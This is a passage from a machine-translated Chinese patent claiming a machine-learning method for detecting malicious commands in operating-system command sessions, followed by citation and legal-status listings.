Other embodiments of the application will be apparent to those skilled in the art from consideration of the specification and practice of the application disclosed herein. This application is intended to cover any variations, uses, or adaptations of the application following, in general, the principles of the application and including such departures from the present disclosure as come within known or customary practice within the art to which the application pertains. It is intended that the specification and examples be considered as exemplary only, with a true scope and spirit of the application being indicated by the following claims.
It is to be understood that the application is not limited to the precise arrangements and instrumentalities shown in the drawings, which have been described above, and that various modifications and changes may be effected without departing from the scope thereof. The scope of the application is limited only by the appended claims.

Claims (11)

1. An operation command detection method, characterized in that the method comprises:
acquiring a target command session input in an operating system, wherein the target command session comprises at least one operation command;
replacing the specified type element contained in the at least one operation command with a specified command word; the specified type elements include at least one of the following type elements: a field consisting of consecutive digits, an internet protocol, IP, address, and a command ending language;
acquiring word vectors of all command words contained in the at least one operation command;
acquiring the frequency of each command word in a word vector training set, wherein the word vector training set is a set of word vectors corresponding to a training command session; the word vector training set is used for training through a preset word vector training model so as to obtain word vectors of command words in the word vector training set;
Smoothing the frequency of each command word in the word vector training set to obtain the weight of each command word; according to the weights corresponding to the command words, carrying out weighted summation on word vectors of the command words to obtain command session vectors of the target command session; the smoothing processing is performed on the frequency of occurrence of each command word in the word vector training set to obtain the weight corresponding to each command word, including: dividing a smoothing coefficient by the sum of the smoothing coefficient and the frequency of the target command word for the target command word in each command word to obtain the weight corresponding to the target command word;
processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a specified type of command; the classification model is a machine learning model obtained through command session sample and annotation information training, and the annotation information is used for indicating whether the command session sample contains the specified type of command.
2. The method of claim 1, wherein the processing the command session vector by the classification model further comprises, prior to obtaining a classification result:
removing a common part in the command session vector, wherein the common part is obtained by a principal component analysis mode;
the command session vector is processed through a classification model to obtain a classification result, which comprises the following steps:
and processing the command session vector after the common part is removed through the classification model to obtain the classification result.
3. The method of claim 1, wherein the obtaining a word vector for each command word included in the at least one operation command comprises:
and executing the step of acquiring word vectors of all command words contained in the at least one operation command when the target command session meets the filtering condition.
4. A method according to claim 3, wherein the filtering conditions comprise at least one of the following conditions:
the corresponding command session does not contain messy codes, the corresponding command session has the correct source, and the acquisition time of the corresponding command session is within the specified time period.
5. The method of claim 1, wherein the classification model includes n classification sub-models, n being an integer greater than or equal to 2, wherein the processing the command session vector through the classification model to obtain a classification result includes:
processing the command session vector through the n classification sub-models respectively to obtain classification sub-results output by the n classification sub-models respectively;
and obtaining the classification result according to the classification sub-results output by the n classification sub-models respectively.
6. The method of claim 5, wherein the classification results obtained from the classification sub-results output by each of the n classification sub-models comprise:
performing binarization processing on classification sub-results output by each of the n classification sub-models to obtain n binarization values;
and obtaining the average value of the n binarized values as the classification result.
7. The method of claim 5, wherein the classification sub-result is used to indicate a probability of including the specified type of command in the target command session; the classification result obtained according to the classification sub-results output by the n classification sub-models respectively comprises:
And obtaining the average value of the probabilities indicated by the n classification sub-models as the classification result.
8. The method of claim 1, wherein the specified type of command comprises a malicious command.
9. An operation command detection apparatus, characterized in that the apparatus comprises:
the system comprises a session acquisition module, a processing module and a processing module, wherein the session acquisition module is used for acquiring a target command session input in an operating system, and the target command session comprises at least one operation command;
the replacing module is used for replacing the specified type elements contained in the at least one operation command with specified command words; the specified type elements include at least one of the following type elements: a field consisting of consecutive digits, an internet protocol, IP, address, and a command ending language;
the word vector acquisition module is used for acquiring word vectors of all command words contained in the at least one operation command;
the conversation vector acquisition module is used for acquiring the frequency of each command word in a word vector training set, wherein the word vector training set is a set of word vectors corresponding to a training command conversation; the word vector training set is used for training through a preset word vector training model so as to obtain word vectors of command words in the word vector training set; smoothing the frequency of each command word in the word vector training set to obtain the weight of each command word; according to the weights corresponding to the command words, carrying out weighted summation on word vectors of the command words to obtain command session vectors of the target command session; the smoothing processing is performed on the frequency of occurrence of each command word in the word vector training set to obtain the weight corresponding to each command word, including: dividing a smoothing coefficient by the sum of the smoothing coefficient and the frequency of the target command word for the target command word in each command word to obtain the weight corresponding to the target command word;
The classification module is used for processing the command session vector through a classification model to obtain a classification result, wherein the classification result is used for indicating whether the target command session contains a command of a specified type or not; the classification model is a machine learning model obtained through command session sample and annotation information training, and the annotation information is used for indicating whether the command session sample contains the specified type of command.
10. A computer device comprising a processor and a memory, wherein the memory stores at least one instruction, at least one program, a set of codes, or a set of instructions, the at least one instruction, the at least one program, the set of codes, or the set of instructions being loaded and executed by the processor to implement the method of operation command detection as claimed in any one of claims 1 to 8.
11. A computer readable storage medium having stored therein at least one instruction, at least one program, code set, or instruction set, the at least one instruction, the at least one program, the code set, or instruction set being loaded and executed by a processor to implement the method of operation command detection as claimed in any one of claims 1 to 8.
CN201910250265.XA 2019-03-29 2019-03-29 Operation command detection method, device, computer equipment and storage medium Active CN110414229B (en)

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201910250265.XA CN110414229B (en) 2019-03-29 2019-03-29 Operation command detection method, device, computer equipment and storage medium

Applications Claiming Priority (1)

Application Number Priority Date Filing Date Title
CN201910250265.XA CN110414229B (en) 2019-03-29 2019-03-29 Operation command detection method, device, computer equipment and storage medium

Publications (2)

Publication Number Publication Date
CN110414229A CN110414229A (en) 2019-11-05
CN110414229B true CN110414229B (en) 2023-12-12

Family

ID=68357562

Family Applications (1)

Application Number Title Priority Date Filing Date
CN201910250265.XA Active CN110414229B (en) 2019-03-29 2019-03-29 Operation command detection method, device, computer equipment and storage medium

Country Status (1)

Country Link
CN (1) CN110414229B (en)

Families Citing this family (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN114548617A (en) * 2020-11-18 2022-05-27 中国移动通信集团江西有限公司 Command risk assessment method and related equipment
CN113360305A (en) * 2021-05-13 2021-09-07 杭州明实科技有限公司 Computer equipment and abnormal operation detection method, device and storage medium thereof
CN114969725A (en) * 2022-04-18 2022-08-30 中移互联网有限公司 Target command identification method and device, electronic equipment and readable storage medium
CN115499207A (en) * 2022-09-15 2022-12-20 中债金科信息技术有限公司 Intrusion detection method and device, storage medium and electronic equipment

Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
WO2015079591A1 (en) * 2013-11-27 2015-06-04 Nec Corporation Crosslingual text classification method using expected frequencies
CN107844560A (en) * 2017-10-30 2018-03-27 北京锐安科技有限公司 A kind of method, apparatus of data access, computer equipment and readable storage medium storing program for executing
CN107967488A (en) * 2017-11-28 2018-04-27 网宿科技股份有限公司 The sorting technique and categorizing system of a kind of server
CN108259482A (en) * 2018-01-04 2018-07-06 平安科技(深圳)有限公司 Network Abnormal data detection method, device, computer equipment and storage medium
CN108536679A (en) * 2018-04-13 2018-09-14 腾讯科技(成都)有限公司 Name entity recognition method, device, equipment and computer readable storage medium
CN109344615A (en) * 2018-07-27 2019-02-15 北京奇虎科技有限公司 A kind of method and device detecting malicious commands
CN109492108A (en) * 2018-11-22 2019-03-19 上海唯识律简信息科技有限公司 Multi-level fusion Document Classification Method and system based on deep learning

Family Cites Families (4)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
US7624006B2 (en) * 2004-09-15 2009-11-24 Microsoft Corporation Conditional maximum likelihood estimation of naïve bayes probability models
US9819689B2 (en) * 2015-03-13 2017-11-14 Microsoft Technology Licensing, Llc Large scale malicious process detection
US10754948B2 (en) * 2017-04-18 2020-08-25 Cylance Inc. Protecting devices from malicious files based on n-gram processing of sequential data
RU2679785C1 (en) * 2017-10-18 2019-02-12 Акционерное общество "Лаборатория Касперского" System and method of classification of objects

Patent Citations (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
WO2015079591A1 (en) * 2013-11-27 2015-06-04 Nec Corporation Crosslingual text classification method using expected frequencies
CN107844560A (en) * 2017-10-30 2018-03-27 北京锐安科技有限公司 A kind of method, apparatus of data access, computer equipment and readable storage medium storing program for executing
CN107967488A (en) * 2017-11-28 2018-04-27 网宿科技股份有限公司 The sorting technique and categorizing system of a kind of server
CN108259482A (en) * 2018-01-04 2018-07-06 平安科技(深圳)有限公司 Network Abnormal data detection method, device, computer equipment and storage medium
CN108536679A (en) * 2018-04-13 2018-09-14 腾讯科技(成都)有限公司 Name entity recognition method, device, equipment and computer readable storage medium
CN109344615A (en) * 2018-07-27 2019-02-15 北京奇虎科技有限公司 A kind of method and device detecting malicious commands
CN109492108A (en) * 2018-11-22 2019-03-19 上海唯识律简信息科技有限公司 Multi-level fusion Document Classification Method and system based on deep learning

Also Published As

Publication number Publication date
CN110414229A (en) 2019-11-05

Similar Documents

Publication Publication Date Title
CN110414229B (en) Operation command detection method, device, computer equipment and storage medium
TWI673625B (en) Uniform resource locator (URL) attack detection method, device and electronic device
CN109583332B (en) Face recognition method, face recognition system, medium, and electronic device
CN112270196B (en) Entity relationship identification method and device and electronic equipment
CN110472675B (en) Image classification method, image classification device, storage medium and electronic equipment
CN108108743B (en) Abnormal user identification method and device for identifying abnormal user
WO2023179429A1 (en) Video data processing method and apparatus, electronic device, and storage medium
CN112200081A (en) Abnormal behavior identification method and device, electronic equipment and storage medium
CN110175851B (en) Cheating behavior detection method and device
CN109271957B (en) Face gender identification method and device
CN112507912B (en) Method and device for identifying illegal pictures
CN111475622A (en) Text classification method, device, terminal and storage medium
CN114138968B (en) Network hotspot mining method, device, equipment and storage medium
CN112052451A (en) Webshell detection method and device
CN112883990A (en) Data classification method and device, computer storage medium and electronic equipment
CN112800919A (en) Method, device and equipment for detecting target type video and storage medium
CN113051911A (en) Method, apparatus, device, medium, and program product for extracting sensitive word
Saranya Shree et al. Prediction of fake Instagram profiles using machine learning
CN115758211A (en) Text information classification method and device, electronic equipment and storage medium
CN118339550A (en) Geometric problem solving method, device, equipment and storage medium
CN115858776A (en) Variant text classification recognition method, system, storage medium and electronic equipment
CN115880702A (en) Data processing method, device, equipment, program product and storage medium
CN109670470B (en) Pedestrian relationship identification method, device and system and electronic equipment
CN111860662B (en) Training method and device, application method and device of similarity detection model
CN118134529B (en) Big data-based computer data processing method and system

Legal Events

Date Code Title Description
PB01 Publication
PB01 Publication
SE01 Entry into force of request for substantive examination
SE01 Entry into force of request for substantive examination
GR01 Patent grant
GR01 Patent grant
TG01 Patent term adjustment